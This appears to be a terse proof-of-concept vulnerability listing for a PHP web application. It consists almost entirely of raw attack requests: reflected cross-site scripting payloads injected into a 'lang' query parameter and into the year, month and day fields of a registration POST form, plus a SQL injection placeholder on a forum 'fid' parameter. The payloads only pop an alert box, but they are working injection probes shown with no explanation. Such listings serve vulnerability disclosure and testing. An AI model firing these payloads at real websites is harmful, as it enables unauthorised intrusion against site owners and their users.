http://www.example.com/documentation/index_list.php?lang="><script>alert(/EllipsisSecurityTest/)</script> POST http://www.example.com:80/registration.php?register=Register HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: www.example.com ml=1&year="><script>alert(/EllipsisSecurityTest/)</script> POST http://www.example.com:80/registration.php?register=Register HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: www.example.com ml=1&month="><script>alert(/EllipsisSecurityTest/)</script> POST http://www.example.com:80/registration.php?register=Register HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Host: www.example.com ml=1&day="><script>alert(/EllipsisSecurityTest/)</script> http://www.example.com/forum/index.php?fid=-1[SQL]